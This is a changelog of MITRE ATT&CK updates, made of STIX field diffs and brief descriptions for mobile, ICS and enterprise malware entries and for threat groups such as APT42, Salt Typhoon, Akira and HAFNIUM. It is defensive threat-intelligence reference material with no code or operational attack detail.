[S0305] SpyNote RAT
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:04.768000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0328] Stealth Mango
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:03.669000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0545] TERRACOTTA
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-12-28 18:59:32.817000+00:00 | 2025-04-16 21:22:15.370000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0329] Tangelo
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:06.838000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1069] TangleBot
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-01 22:00:09.640000+00:00 | 2025-04-16 21:22:09.556000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S1056] TianySpy
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-29 21:11:14.364000+00:00 | 2025-04-16 21:22:16.464000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0558] Tiktok Pro
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-19 16:30:16.930000+00:00 | 2025-04-16 21:22:13.285000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0424] Triada
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-05-28 16:52:37.979000+00:00 | 2025-04-16 21:22:15.523000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0427] TrickMo
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-09-11 15:57:37.561000+00:00 | 2025-04-16 21:22:04.918000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0307] Trojan-SMS.AndroidOS.Agent.ao
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:11.724000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0306] Trojan-SMS.AndroidOS.FakeInst.a
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:05.907000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0308] Trojan-SMS.AndroidOS.OpFake.a
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:14.410000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0302] Twitoor
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:07.968000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0418] ViceLeaker
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-26 19:00:42.233000+00:00 | 2025-04-16 21:22:10.060000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0506] ViperRAT
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-09-29 20:03:42.662000+00:00 | 2025-04-16 21:22:15.850000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0312] WireLurker
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:06.693000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0489] WolfRAT
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-09-11 15:58:40.564000+00:00 | 2025-04-16 21:22:14.905000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0314] X-Agent for Android
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:08.784000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0318] XLoader for Android
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:05.761000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0490] XLoader for iOS
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-12-07 14:46:08.852000+00:00 | 2025-04-16 21:22:06.053000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0298] Xbot
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:17.393000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0297] XcodeGhost
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:14.566000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0311] YiSpecter
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-20 18:19:15.826000+00:00 | 2025-04-16 21:22:11.527000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0494] Zen
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-08-11 14:23:15.002000+00:00 | 2025-04-16 21:22:05.422000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0287] ZergHelper
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:07.644000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
ics-attack
New Software
[S1165] FrostyGoop
Current version: 1.0
Description:
FrostyGoop is a Windows-based binary written in Golang that allows for interaction with industrial control system (ICS) equipment via Modbus TCP over port 502. FrostyGoop allows for reading and writing data to holding registers on targeted devices, manipulating the operation of systems for malicious purposes. FrostyGoop is associated with the FrostyGoop Incident in Ukraine.(Citation: Dragos FROSTYGOOP 2024)(Citation: Nozomi BUSTLEBERM 2024)
Minor Version Changes
[S0606] Bad Rabbit
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | [Bad Rabbit](https://attack.mitre.org/software/S0606) is a s | t | [Bad Rabbit](https://attack.mitre.org/software/S0606) is a s |
| elf-propagating ransomware that affected the Ukrainian trans | | elf-propagating ransomware that affected the Ukrainian trans |
| portation sector in 2017. [Bad Rabbit](https://attack.mitre. | | portation sector in 2017. [Bad Rabbit](https://attack.mitre. |
| org/software/S0606) has also targeted organizations and cons | | org/software/S0606) has also targeted organizations and cons |
| umers in Russia. (Citation: Secure List Bad Rabbit)(Citation | | umers in Russia. (Citation: Secure List Bad Rabbit)(Citation |
| : ESET Bad Rabbit)(Citation: Dragos IT ICS Ransomware) | | : ESET Bad Rabbit)(Citation: Dragos Apr 2019) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-12 17:29:57.200000+00:00 | 2025-01-02 19:45:31.402000+00:00 |
| description | [Bad Rabbit](https://attack.mitre.org/software/S0606) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://attack.mitre.org/software/S0606) has also targeted organizations and consumers in Russia. (Citation: Secure List Bad Rabbit)(Citation: ESET Bad Rabbit)(Citation: Dragos IT ICS Ransomware) | [Bad Rabbit](https://attack.mitre.org/software/S0606) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://attack.mitre.org/software/S0606) has also targeted organizations and consumers in Russia. (Citation: Secure List Bad Rabbit)(Citation: ESET Bad Rabbit)(Citation: Dragos Apr 2019) |
| external_references[3]['source_name'] | Dragos IT ICS Ransomware | Dragos Apr 2019 |
| external_references[3]['description'] | Slowik, J.. (2019, April 10). Implications of IT Ransomware for ICS Environments. Retrieved January 28, 2021. | Joe Slowik. (2019, April 10). Implications of IT Ransomware for ICS Environments. Retrieved October 27, 2019. |
| external_references[3]['url'] | https://www.dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/ | https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/ |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
[S1010] VPNFilter
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-08-15 22:01:22.169000+00:00 | 2025-04-15 19:46:34.471000+00:00 |
| x_mitre_version | 2.0 | 2.1 |
| x_mitre_platforms[0] | Network | Network Devices |
Patches
[S1000] ACAD/Medre.A
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-12 17:15:44.068000+00:00 | 2025-04-16 21:26:25.077000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0093] Backdoor.Oldrea
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-12 17:18:25.971000+00:00 | 2025-04-16 20:37:53.808000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0608] Conficker
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-08 22:15:47.458000+00:00 | 2025-04-16 20:38:10.239000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0038] Duqu
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-08 22:17:50.971000+00:00 | 2025-04-16 20:38:14.352000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0605] EKANS
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-08 22:04:48.834000+00:00 | 2025-04-16 20:37:51.908000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0143] Flame
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-12 17:51:18.408000+00:00 | 2025-04-16 20:38:46.014000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1045] INCONTROLLER
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-17 16:23:24.812000+00:00 | 2025-04-16 21:26:25.242000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S1072] Industroyer2
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-06 22:00:22.774000+00:00 | 2025-04-16 20:38:14.728000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0368] NotPetya
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-08 22:11:21.842000+00:00 | 2025-04-16 20:38:09.202000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S1006] PLC-Blaster
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-12 17:59:55.276000+00:00 | 2025-04-16 21:26:24.423000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0496] REvil
Current version: 2.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-11 00:15:32.724000+00:00 | 2024-11-17 23:08:38.543000+00:00 |
| external_references[14]['description'] | Tetra Defense. (2020, March). CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS. Retrieved December 14, 2020. | Tetra Defense. (2020, March). CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS. Retrieved November 17, 2024. |
| external_references[14]['url'] | https://www.tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis | https://web.archive.org/web/20210414101816/https://tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis/ |
[S0446] Ryuk
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-09 18:11:35.634000+00:00 | 2025-04-16 20:38:27.373000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0603] Stuxnet
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-10 23:46:32.577000+00:00 | 2025-01-02 19:40:26.678000+00:00 |
| external_references[3]['url'] | https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf | https://web-assets.esetstatic.com/wls/2012/11/Stuxnet_Under_the_Microscope.pdf |
| external_references[4]['description'] | Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 | Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved November 17, 2024. |
| external_references[4]['url'] | https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf | https://docs.broadcom.com/doc/security-response-w32-stuxnet-dossier-11-en |
[S0366] WannaCry
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-08 22:20:20.868000+00:00 | 2024-12-09 02:29:13.859000+00:00 |
| external_references[8]['description'] | Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019. | Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved December 8, 2024. |
| external_references[8]['url'] | https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/ | https://web.archive.org/web/20230522041200/https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/ |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
Groups
enterprise-attack
New Groups
[G1044] APT42
Current version: 1.0
Description:
APT42 is an Iranian-sponsored threat group that conducts cyber espionage and surveillance.(Citation: Mandiant APT42-charms) The group primarily focuses on targets in the Middle East region, but has targeted a variety of industries and countries since at least 2015.(Citation: Mandiant APT42-charms) APT42 starts cyber operations through spearphishing emails and/or the PINEFLOWER Android malware, then monitors and collects information from the compromised systems and devices.(Citation: Mandiant APT42-charms) Finally, APT42 exfiltrates data using native features and open-source tools.(Citation: Mandiant APT42-untangling)
APT42 activities have been linked to Magic Hound by other commercial vendors. While there are behavior and software overlaps between Magic Hound and APT42, they appear to be distinct entities and are tracked as separate entities by their originating vendor.
[G1043] BlackByte
Current version: 1.0
Description:
BlackByte is a ransomware threat actor operating since at least 2021. BlackByte is associated with several versions of ransomware also labeled BlackByte Ransomware. BlackByte ransomware operations initially used a common encryption key allowing for the development of a universal decryptor, but subsequent versions such as BlackByte 2.0 Ransomware use more robust encryption mechanisms. BlackByte is notable for operations targeting critical infrastructure entities among other targets across North America.(Citation: FBI BlackByte 2022)(Citation: Picus BlackByte 2022)(Citation: Symantec BlackByte 2022)(Citation: Microsoft BlackByte 2023)(Citation: Cisco BlackByte 2024)
[G1042] RedEcho
Current version: 1.0
Description:
RedEcho is a People’s Republic of China-related threat actor associated with long-running intrusions in Indian critical infrastructure entities. RedEcho overlaps with various other PRC-linked threat groups, such as APT41, and is linked to ShadowPad malware use through shared infrastructure.(Citation: RecordedFuture RedEcho 2021)(Citation: RecordedFuture RedEcho 2022)
[G1045] Salt Typhoon
Current version: 1.0
Description:
Salt Typhoon is a People's Republic of China (PRC) state-backed actor that has been active since at least 2019 and responsible for numerous compromises of network infrastructure at major U.S. telecommunication and internet service providers (ISP).(Citation: US Dept. of Treasury Salt Typhoon JAN 2025)(Citation: Cisco Salt Typhoon FEB 2025)
[G1041] Sea Turtle
Current version: 1.0
Description:
Sea Turtle is a Türkiye-linked threat actor active since at least 2017 performing espionage and service provider compromise operations against victims in Asia, Europe, and North America. Sea Turtle is notable for targeting registrars managing ccTLDs and complex DNS-based intrusions where the threat actor compromised DNS providers to hijack DNS resolution for ultimate victims, enabling Sea Turtle to spoof log in portals and other applications for credential collection.(Citation: Talos Sea Turtle 2019)(Citation: Talos Sea Turtle 2019_2)(Citation: PWC Sea Turtle 2023)(Citation: Hunt Sea Turtle 2024)
[G1046] Storm-1811
Current version: 1.0
Description:
Storm-1811 is a financially-motivated entity linked to Black Basta ransomware deployment. Storm-1811 is notable for unique phishing and social engineering mechanisms for initial access, such as overloading victim email inboxes with non-malicious spam to prompt a fake "help desk" interaction leading to the deployment of adversary tools and capabilities.(Citation: Microsoft Storm-1811 2024)(Citation: rapid7-email-bombing)(Citation: RedCanary Storm-1811 2024)(Citation: RedCanary June Insights 2024)
[G1047] Velvet Ant
Current version: 1.0
Description:
Velvet Ant is a threat actor operating since at least 2021. Velvet Ant is associated with complex persistence mechanisms, the targeting of network devices and appliances during operations, and the use of zero day exploits.(Citation: Sygnia VelvetAnt 2024A)(Citation: Sygnia VelvetAnt 2024B)
Major Version Changes
[G1024] Akira
Current version: 2.0
Version changed from: 1.0 → 2.0
|
|
|---|
| t | [Akira](https://attack.mitre.org/groups/G1024) is a ransomwa | t | [Akira](https://attack.mitre.org/groups/G1024) is a ransomwa |
| re variant and ransomware deployment entity active since at | | re variant and ransomware deployment entity active since at |
| least March 2023.(Citation: Arctic Wolf Akira 2023) [Akira]( | | least March 2023.(Citation: Arctic Wolf Akira 2023) [Akira]( |
| https://attack.mitre.org/groups/G1024) uses compromised cred | | https://attack.mitre.org/groups/G1024) uses compromised cred |
| entials to access single-factor external access mechanisms s | | entials to access single-factor external access mechanisms s |
| uch as VPNs for initial access, then various publicly-availa | | uch as VPNs for initial access, then various publicly-availa |
| ble tools and techniques for lateral movement.(Citation: Arc | | ble tools and techniques for lateral movement.(Citation: Arc |
| tic Wolf Akira 2023)(Citation: Secureworks GOLD SAHARA) [Aki | | tic Wolf Akira 2023)(Citation: Secureworks GOLD SAHARA) [Aki |
| ra](https://attack.mitre.org/groups/G1024) operations are as | | ra](https://attack.mitre.org/groups/G1024) operations are as |
| sociated with "double extortion" ransomware activity, where | | sociated with "double extortion" ransomware activity, where |
| data is exfiltrated from victim environments prior to encryp | | data is exfiltrated from victim environments prior to encryp |
| tion, with threats to publish files if a ransom is not paid. | | tion, with threats to publish files if a ransom is not paid. |
| Technical analysis of [Akira](https://attack.mitre.org/soft | | Technical analysis of [Akira](https://attack.mitre.org/soft |
| ware/S1129) ransomware indicates multiple overlaps with and | | ware/S1129) ransomware indicates variants capable of targeti |
| similarities to [Conti](https://attack.mitre.org/software/S0 | | ng Windows or VMWare ESXi hypervisors and multiple overlaps |
| 575) malware.(Citation: BushidoToken Akira 2023) | | with [Conti](https://attack.mitre.org/software/S0575) ransom |
| | | ware.(Citation: BushidoToken Akira 2023)(Citation: CISA Akir |
| | | a Ransomware APR 2024)(Citation: Cisco Akira Ransomware OCT |
| | | 2024) |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_contributors | | ['Jiraput Thamsongkrah'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-03 10:32:50.221000+00:00 | 2025-03-11 15:36:38.244000+00:00 |
| description | [Akira](https://attack.mitre.org/groups/G1024) is a ransomware variant and ransomware deployment entity active since at least March 2023.(Citation: Arctic Wolf Akira 2023) [Akira](https://attack.mitre.org/groups/G1024) uses compromised credentials to access single-factor external access mechanisms such as VPNs for initial access, then various publicly-available tools and techniques for lateral movement.(Citation: Arctic Wolf Akira 2023)(Citation: Secureworks GOLD SAHARA) [Akira](https://attack.mitre.org/groups/G1024) operations are associated with "double extortion" ransomware activity, where data is exfiltrated from victim environments prior to encryption, with threats to publish files if a ransom is not paid. Technical analysis of [Akira](https://attack.mitre.org/software/S1129) ransomware indicates multiple overlaps with and similarities to [Conti](https://attack.mitre.org/software/S0575) malware.(Citation: BushidoToken Akira 2023) | [Akira](https://attack.mitre.org/groups/G1024) is a ransomware variant and ransomware deployment entity active since at least March 2023.(Citation: Arctic Wolf Akira 2023) [Akira](https://attack.mitre.org/groups/G1024) uses compromised credentials to access single-factor external access mechanisms such as VPNs for initial access, then various publicly-available tools and techniques for lateral movement.(Citation: Arctic Wolf Akira 2023)(Citation: Secureworks GOLD SAHARA) [Akira](https://attack.mitre.org/groups/G1024) operations are associated with "double extortion" ransomware activity, where data is exfiltrated from victim environments prior to encryption, with threats to publish files if a ransom is not paid. Technical analysis of [Akira](https://attack.mitre.org/software/S1129) ransomware indicates variants capable of targeting Windows or VMWare ESXi hypervisors and multiple overlaps with [Conti](https://attack.mitre.org/software/S0575) ransomware.(Citation: BushidoToken Akira 2023)(Citation: CISA Akira Ransomware APR 2024)(Citation: Cisco Akira Ransomware OCT 2024) |
| x_mitre_version | 1.0 | 2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| aliases | | Howling Scorpius |
| external_references | | {'source_name': 'Howling Scorpius', 'description': '(Citation: Palo Alto Howling Scorpius DEC 2024)'} |
| external_references | | {'source_name': 'CISA Akira Ransomware APR 2024', 'description': 'CISA et al. (2024, April 18). #StopRansomware: Akira Ransomware. Retrieved December 10, 2024.', 'url': 'https://www.cisa.gov/sites/default/files/2024-04/aa24-109a-stopransomware-akira-ransomware_2.pdf'} |
| external_references | | {'source_name': 'Cisco Akira Ransomware OCT 2024', 'description': 'Nutland, J. and Szeliga, M. (2024, October 21). Akira ransomware continues to evolve. Retrieved December 10, 2024.', 'url': 'https://blog.talosintelligence.com/akira-ransomware-continues-to-evolve/'} |
| external_references | | {'source_name': 'Palo Alto Howling Scorpius DEC 2024', 'description': 'Zemah, Y. (2024, December 2). Threat Assessment: Howling Scorpius (Akira Ransomware). Retrieved January 8, 2025.', 'url': 'https://unit42.paloaltonetworks.com/threat-assessment-howling-scorpius-akira-ransomware/'} |
[G0125] HAFNIUM
Current version: 3.0
Version changed from: 2.0 → 3.0
|
|
|---|
| t | [HAFNIUM](https://attack.mitre.org/groups/G0125) is a likely | t | [HAFNIUM](https://attack.mitre.org/groups/G0125) is a likely |
| state-sponsored cyber espionage group operating out of Chin | | state-sponsored cyber espionage group operating out of Chin |
| a that has been active since at least January 2021. [HAFNIUM | | a that has been active since at least January 2021. [HAFNIUM |
| ](https://attack.mitre.org/groups/G0125) primarily targets e | | ](https://attack.mitre.org/groups/G0125) primarily targets e |
| ntities in the US across a number of industry sectors, inclu | | ntities in the US across a number of industry sectors, inclu |
| ding infectious disease researchers, law firms, higher educa | | ding infectious disease researchers, law firms, higher educa |
| tion institutions, defense contractors, policy think tanks, | | tion institutions, defense contractors, policy think tanks, |
| and NGOs.(Citation: Microsoft HAFNIUM March 2020)(Citation: | | and NGOs. [HAFNIUM](https://attack.mitre.org/groups/G0125) h |
| Volexity Exchange Marauder March 2021) | | as targeted remote management tools and cloud software for i |
| | | ntial access and has demonstrated an ability to quickly oper |
| | | ationalize exploits for identified vulnerabilities in edge d |
| | | evices.(Citation: Microsoft HAFNIUM March 2020)(Citation: Vo |
| | | lexity Exchange Marauder March 2021)(Citation: Microsoft Sil |
| | | k Typhoon MAR 2025) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-01-08 20:45:37.568000+00:00 | 2025-03-25 18:04:13.368000+00:00 |
| description | [HAFNIUM](https://attack.mitre.org/groups/G0125) is a likely state-sponsored cyber espionage group operating out of China that has been active since at least January 2021. [HAFNIUM](https://attack.mitre.org/groups/G0125) primarily targets entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021) | [HAFNIUM](https://attack.mitre.org/groups/G0125) is a likely state-sponsored cyber espionage group operating out of China that has been active since at least January 2021. [HAFNIUM](https://attack.mitre.org/groups/G0125) primarily targets entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs. [HAFNIUM](https://attack.mitre.org/groups/G0125) has targeted remote management tools and cloud software for intial access and has demonstrated an ability to quickly operationalize exploits for identified vulnerabilities in edge devices.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)(Citation: Microsoft Silk Typhoon MAR 2025) |
| external_references[1]['description'] | (Citation: Microsoft Threat Actor Naming July 2023) | (Citation: Microsoft Threat Actor Naming July 2023)(Citation: Microsoft Silk Typhoon MAR 2025) |
| x_mitre_version | 2.0 | 3.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Microsoft Silk Typhoon MAR 2025', 'description': 'Microsoft Threat Intelligence . (2025, March 5). Silk Typhoon targeting IT supply chain. Retrieved March 20, 2025.', 'url': 'https://www.microsoft.com/en-us/security/blog/2025/03/05/silk-typhoon-targeting-it-supply-chain/'} |
[G0030] Lotus Blossom
Current version: 4.0
Version changed from: 3.0 → 4.0
|
|
|---|
| t | [Lotus Blossom](https://attack.mitre.org/groups/G0030) is a | t | [Lotus Blossom](https://attack.mitre.org/groups/G0030) is a |
| threat group that has targeted government and military organ | | long-standing threat group largely targeting various entitie |
| izations in Southeast Asia. (Citation: Lotus Blossom Jun 201 | | s in Asia since at least 2009. In addition to government and |
| 5) | | related targets, [Lotus Blossom](https://attack.mitre.org/g |
| | | roups/G0030) has also targeted entities such as digital cert |
| | | ificate issuers.(Citation: Lotus Blossom Jun 2015)(Citation: |
| | | Symantec Bilbug 2022)(Citation: Cisco LotusBlossom 2025) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-01-08 21:58:31.089000+00:00 | 2025-04-04 17:35:44.589000+00:00 |
| description | [Lotus Blossom](https://attack.mitre.org/groups/G0030) is a threat group that has targeted government and military organizations in Southeast Asia. (Citation: Lotus Blossom Jun 2015) | [Lotus Blossom](https://attack.mitre.org/groups/G0030) is a long-standing threat group largely targeting various entities in Asia since at least 2009. In addition to government and related targets, [Lotus Blossom](https://attack.mitre.org/groups/G0030) has also targeted entities such as digital certificate issuers.(Citation: Lotus Blossom Jun 2015)(Citation: Symantec Bilbug 2022)(Citation: Cisco LotusBlossom 2025) |
| external_references[6]['description'] | Accenture Security. (2018, January 27). DRAGONFISH DELIVERS NEW FORM OF ELISE MALWARE TARGETING ASEAN DEFENCE MINISTERS’ MEETING AND ASSOCIATES. Retrieved November 14, 2018. | Accenture Security. (2018, January 27). DRAGONFISH DELIVERS NEW FORM OF ELISE MALWARE TARGETING ASEAN DEFENCE MINISTERS’ MEETING AND ASSOCIATES. Retrieved November 17, 2024. |
| external_references[6]['url'] | https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf | https://web.archive.org/web/20190508165226/https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf |
| x_mitre_version | 3.0 | 4.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| aliases | | Bilbug |
| aliases | | Thrip |
| external_references | | {'source_name': 'Thrip', 'description': '(Citation: Cisco LotusBlossom 2025)'} |
| external_references | | {'source_name': 'Bilbug', 'description': '(Citation: Symantec Bilbug 2022)'} |
| external_references | | {'source_name': 'Cisco LotusBlossom 2025', 'description': 'Joey Chen, Cisco Talos. (2025, February 27). Lotus Blossom espionage group targets multiple industries with different versions of Sagerunex and hacking tools. Retrieved March 15, 2025.', 'url': 'https://blog.talosintelligence.com/lotus-blossom-espionage-group/'} |
| external_references | | {'source_name': 'Symantec Bilbug 2022', 'description': 'Symntec Threat Hunter Team. (2022, November 12). Billbug: State-sponsored Actor Targets Cert Authority, Government Agencies in Multiple Asian Countries. Retrieved March 15, 2025.', 'url': 'https://www.security.com/threat-intelligence/espionage-asia-governments-cert-authority'} |
[G0049] OilRig
Current version: 5.0
Version changed from: 4.1 → 5.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-04 20:33:04.739000+00:00 | 2025-01-16 18:55:49.463000+00:00 |
| x_mitre_version | 4.1 | 5.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| aliases | | Earth Simnavaz |
| aliases | | Crambus |
| aliases | | TA452 |
| external_references | | {'source_name': 'TA452', 'description': '(Citation: Proofpoint Iranian Aligned Attacks JAN 2020)'} |
| external_references | | {'source_name': 'Crambus', 'description': '(Citation: Symantec Crambus OCT 2023)'} |
| external_references | | {'source_name': 'Earth Simnavaz', 'description': '(Citation: Trend Micro Earth Simnavaz October 2024)'} |
| external_references | | {'source_name': 'Trend Micro Earth Simnavaz October 2024', 'description': 'Fahmy, M. et al. (2024, October 11). Earth Simnavaz (aka APT34) Levies Advanced Cyberattacks Against Middle East. Retrieved November 27, 2024.', 'url': 'https://www.trendmicro.com/en_us/research/24/j/earth-simnavaz-cyberattacks.html'} |
